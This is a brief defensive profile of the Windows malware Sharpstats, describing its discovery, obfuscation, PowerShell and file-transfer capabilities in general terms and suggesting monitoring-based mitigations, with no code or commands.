Sharpstats affects Windows operating systems and has various abilities, including the ability to identify the domain, date, time, IP address, machine name, and OS of the compromised host, the ability to identify the username, and the ability to upload and download files. Sharpstats is obfuscated using base64 encoding and XOR, making it difficult to understand.
Sharpstats Malware Capabilities:
Sharpstats may attempt to gather information about a system's network configuration and settings, such as IP and MAC addresses, through information discovery of remote systems. They may also attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Additionally, Sharpstats may try to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. Finally, they may abuse PowerShell commands and scripts for execution, or transfer tools or other files from an external system into a compromised environment.
- Sharpstats may look for details about the network configuration and settings of systems they access, including IP and MAC addresses. They may also attempt to get information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
- The Sharpstats malware may attempt to identify the primary user or users of a system, and may use this information to shape follow-on behaviors such as deciding whether or not to fully infect the target. Sharpstats may also transfer tools or other files from an external system into a compromised environment.
Ways to Mitigate Sharpstats Malware Attacks Capabilities
- The sharpstats can be mitigated by keeping track of command-line interface usage and system and network discovery techniques. These methods can help to detect when the malware is being used to gather information and prevent further damage.
- The sharpstats can be mitigated by monitoring for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as ftp, that does not normally occur may also be suspicious.